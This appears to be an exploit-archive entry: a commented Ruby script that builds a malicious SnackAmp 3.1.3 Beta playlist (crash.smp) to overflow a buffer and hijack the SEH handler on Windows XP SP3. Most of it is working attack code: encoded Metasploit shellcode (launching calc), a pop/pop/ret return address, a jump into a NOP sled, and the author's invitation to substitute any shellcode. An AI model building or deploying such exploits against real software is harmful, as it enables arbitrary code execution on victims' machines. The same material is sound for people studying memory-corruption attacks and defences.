# Title : SnackAmp 3.1.3B Malicious SMP Buffer Overflow Vulnerability (SEH)
# Published : 2010-09-24
# Author : James Fitts
# Previous Title : Audiotran 1.4.2.4 SEH Overflow Exploit (DEP Bypass)
# Next Title : MOAUB #24 - Microsoft Excel OBJ Record Stack Overflow
# Exploit Title: SnackAmp 3.1.3B Malicious SMP Buffer Overflow Vulnerability (SEH)
# Date: 09/24/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://snackamp.sourceforge.net/
# Version: 3.1.3 Beta
# Tested on: Windows XP SP3
# CVE: N/A
# Just like the previous version there is plenty of room for your
# shellcode. Have fun!
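#! /usr/bin/env ruby
# Builds crash.smp for the SnackAmp 3.1.3B SEH overflow. Byte layout:
#   0     5-byte NOP sled                       (padding)
#   5     144-byte shellcode                    (payload)
#   149   'A' filler up to the SEH record       (junk, computed)
#   8788  nSEH "\xeb\x06\x90\x90": jmp short +6 over the handler pointer
#   8792  SEH  pop/pop/ret in pngtcl10.dll
#   8796  jmp rel32 -8797: from the next instruction (8801) this lands on
#         offset 4, the last NOP, and slides into the shellcode
#
# Every fragment is forced to ASCII-8BIT. On Ruby 1.9+ a UTF-8 literal that
# holds bytes >= 0x80 cannot be concatenated with the ASCII-8BIT output of
# Array#pack (Encoding::CompatibilityError), and the file is written in
# binary mode so no newline translation can corrupt the bytes. The "\x.."
# escapes had lost their backslashes in transcription; with plain "x90"
# text the bytes were wrong and the SEH record no longer sat at 8788.

# Handler pointer: pop pop ret from pngtcl10.dll. This is a fixed address for
# the XP SP3 / 3.1.3B build that was tested (no ASLR, non-SafeSEH module);
# re-verify it in a debugger on any other build before relying on it.
SEH = [0x014E9D40].pack('V')
# nSEH: "\xeb\x06" = jmp short +6 (over the 4-byte SEH), then two NOPs.
nSEH = [0x909006eb].pack('V')
# NOP sled in front of the shellcode; jmp_back lands on its last byte.
padding = ("\x90" * 5).b

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
payload = [
  "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc",
  "\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78",
  "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85",
  "\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5",
  "\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c",
  "\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21",
  "\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5",
  "\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27",
  "\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3",
  "\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53",
  "\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f",
  "\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6",
  "\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8",
  "\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61",
  "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f",
  "\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca"
].join.b

# jmp rel32: e9 a3 dd ff ff = jmp -0x225d (-8797) relative to the following
# instruction, i.e. back to the end of the NOP sled.
jmp_back = "\xe9\xa3\xdd\xff\xff".b

# Assembles the SMP file contents.
#
# padding, payload, jmp_back - raw byte strings placed as described above
# nseh, seh                  - the two 4-byte SEH record fields
# seh_offset                 - file offset at which nSEH must start (8788 for
#                              the tested build)
#
# Returns an ASCII-8BIT string. Raises ArgumentError when the sled plus
# shellcode would push past seh_offset (the SEH record would then be
# misplaced and the overwrite silently miss), or when an SEH field is not
# exactly 4 bytes.
def smp_buffer(padding, payload, nseh, seh, jmp_back, seh_offset: 8788)
  filler = seh_offset - padding.bytesize - payload.bytesize
  if filler.negative?
    raise ArgumentError, "sled + shellcode (#{padding.bytesize + payload.bytesize} bytes) exceed SEH offset #{seh_offset}"
  end
  unless nseh.bytesize == 4 && seh.bytesize == 4
    raise ArgumentError, 'nSEH and SEH must each be exactly 4 bytes'
  end
  junk = ("\x41" * filler).b
  [padding, payload, junk, nseh, seh, jmp_back].map(&:b).join.b
end

# Binary mode: the buffer is raw bytes, never text.
File.binwrite("crash.smp", smp_buffer(padding, payload, nSEH, SEH, jmp_back))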